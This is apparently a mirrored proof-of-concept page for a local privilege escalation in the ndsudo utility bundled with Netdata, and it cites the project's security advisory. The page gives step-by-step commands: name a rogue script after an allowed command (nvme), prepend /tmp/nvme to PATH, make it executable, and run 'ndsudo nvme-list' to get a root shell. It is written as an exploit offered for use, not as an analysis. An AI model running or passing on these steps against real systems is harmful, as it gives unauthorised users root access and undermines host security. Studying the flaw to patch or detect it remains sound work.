Share
## https://sploitus.com/exploit?id=872D787E-63BE-5C24-8D3F-FEB60BB21AB9
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)

This is an alternative POC to exploit a vulnerable `ndsudo` utility bundled with Netdata to perform a local privilege escalation.
The exploit works by adding the script inside the user’s `PATH` substituting an allowed command (`nvme`) by `ndsudo` and execute it as root.

---

## Prerequisites & Assumptions :scroll:

- **Local shell access** on the target system.
- Python3 on the target machine
- Possibilty to execute the `ndsudo` command.

---

## Steps

### 1. Script :hammer:

You can either create or upload the script directly to the target machine as long as it's called as one of the allowed commands.
To check the allowed commands by `ndsudo` just launch `ndsudo --help`.

For this poc we'll use the command `nvme-list`
---
### 2. PATH injection :syringe:

Once the script has been created and named after an allowed command by `ndsudo` we need to inject it at the beginning of the `PATH` variable so it will be the first one to be found and executed

```bash
export PATH="/tmp/nvme:$PATH"
```
---
### 3. Execution permissions :gun:

Obviusly the script needs to have execution permissions
```bash
chmod +x /tmp/nvme
```
---
### 4. Trigger the Exploit :boom:

Once everything is set up, just launch `ndsudo` with the rogue script and you're root.

```bash
ndsudo nvme-list
```
---

## Resources :books:

- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93


Hack responsibly :skull: